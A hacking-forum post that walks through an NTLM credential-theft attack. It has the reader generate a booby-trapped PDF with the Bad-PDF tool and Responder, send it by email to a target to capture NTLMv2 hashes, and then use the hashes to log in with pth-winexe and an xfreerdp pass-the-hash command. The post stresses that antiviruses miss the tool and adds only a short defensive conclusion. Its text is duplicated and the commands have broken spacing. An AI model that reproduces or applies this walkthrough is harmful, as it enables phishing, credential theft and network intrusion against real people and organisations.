Father
Professional
- Messages
- 2,601
- Reaction score
- 836
- Points
- 113
To carry out an attack, it is enough to generate and send a PDF file of the target.
Today we will deal with the relative new Bad-PDF utility from Deepzec and its ability to steal NTLM data and hashes of windowed applications. It is not yet detected by most antiviruses. The code was posted on GitHub about 10 days ago.
How to carry out an attack?
We run standard commands. I have been testing on Kali Linux:
This will open a window with a dialog menu. To work, we need to know the IP of our target, the interface and the name of the file. After launching, we need to enter the path of the responder, if it is not automatically detected:
Next, we specify the IP address (2), the file name (3), and select the interface (4). After that, the process starts. If you have errors, it is possible that the interface is incorrect or it is better to enter it with pens.
If everything worked out, go to the next step. We need to deliver the file to our target. It is located in the root of the Bad-Pdf folder. This can be done through mail, social networks, or in another way. I used the mail and sent it to a potential target.
Next, we are waiting for the launch. After a successful attack, we immediately get NTML data. Let's take it can be seen in the screenshot:
Thus, after successful completion, we get the data in NTLMv2.
How can this vulnerability be exploited?
pth-winexe
The point is that this attack is more relevant in corporate networks. There is a major vulnerability in two versions of the NTLM protocol. For authentication, it is enough to know only the user's hash. Thus, having received a hash as shown above, you can enjoy all the advantages of a compromised user's network. This methodology is called Pass The Hash and was first used in 1997. The most popular set of utilities for this implementation is the Pass-the-Hash Toolkit. Let's take a closer look at pth-winexe, which is available from the box in Kali Linux.
FreeRDP
Another utility from the set is FreeRDP. It is a Remote Desktop Protocol console client. One of the features of the client is the ability to use a password hash instead of the password itself.
Example command:
where after / d: is the domain name,
after / u: - username,
after / pth: - hash,
after / v: - server IP.
Windows vs Microsoft
Also, modern versions of the Windows operating system offer you to create a Microsoft account. Do you understand the chain? With the ability to log into your local account using the Bad-Pdf utility, you can go further and get access to mail, Skype and other Microsoft services that will be used. Therefore, this vulnerability is very interesting and has a wide range of uses.
Conclusion
It is better to check the links and files that you open several times. This is very important, as one such discovery can provide all the data for a hacker. Use virtual machines as well as data encryption in all cases. In this case, it is enough to disable the NTLM connection in Group Policy.
Today we will deal with the relative new Bad-PDF utility from Deepzec and its ability to steal NTLM data and hashes of windowed applications. It is not yet detected by most antiviruses. The code was posted on GitHub about 10 days ago.
How to carry out an attack?
We run standard commands. I have been testing on Kali Linux:
Code:
# git clone https://github.com/deepzec/Bad-Pdf.git # cd Bad-Pdf # chmod + x badpdf.py # python badpdf.pyThis will open a window with a dialog menu. To work, we need to know the IP of our target, the interface and the name of the file. After launching, we need to enter the path of the responder, if it is not automatically detected:
Code:
/ usr / sbin / responder // 1Next, we specify the IP address (2), the file name (3), and select the interface (4). After that, the process starts. If you have errors, it is possible that the interface is incorrect or it is better to enter it with pens.
If everything worked out, go to the next step. We need to deliver the file to our target. It is located in the root of the Bad-Pdf folder. This can be done through mail, social networks, or in another way. I used the mail and sent it to a potential target.
Next, we are waiting for the launch. After a successful attack, we immediately get NTML data. Let's take it can be seen in the screenshot:
Thus, after successful completion, we get the data in NTLMv2.
How can this vulnerability be exploited?
pth-winexe
The point is that this attack is more relevant in corporate networks. There is a major vulnerability in two versions of the NTLM protocol. For authentication, it is enough to know only the user's hash. Thus, having received a hash as shown above, you can enjoy all the advantages of a compromised user's network. This methodology is called Pass The Hash and was first used in 1997. The most popular set of utilities for this implementation is the Pass-the-Hash Toolkit. Let's take a closer look at pth-winexe, which is available from the box in Kali Linux.
FreeRDP
Another utility from the set is FreeRDP. It is a Remote Desktop Protocol console client. One of the features of the client is the ability to use a password hash instead of the password itself.
Example command:
Code:
xfreerdp / d: win2012 / u: offcec / pth: 8846F7EAEE8FB117AD06BDD830B7586C /v:192.168.0.1after / u: - username,
after / pth: - hash,
after / v: - server IP.
Windows vs Microsoft
Also, modern versions of the Windows operating system offer you to create a Microsoft account. Do you understand the chain? With the ability to log into your local account using the Bad-Pdf utility, you can go further and get access to mail, Skype and other Microsoft services that will be used. Therefore, this vulnerability is very interesting and has a wide range of uses.
Conclusion
It is better to check the links and files that you open several times. This is very important, as one such discovery can provide all the data for a hacker. Use virtual machines as well as data encryption in all cases. In this case, it is enough to disable the NTLM connection in Group Policy.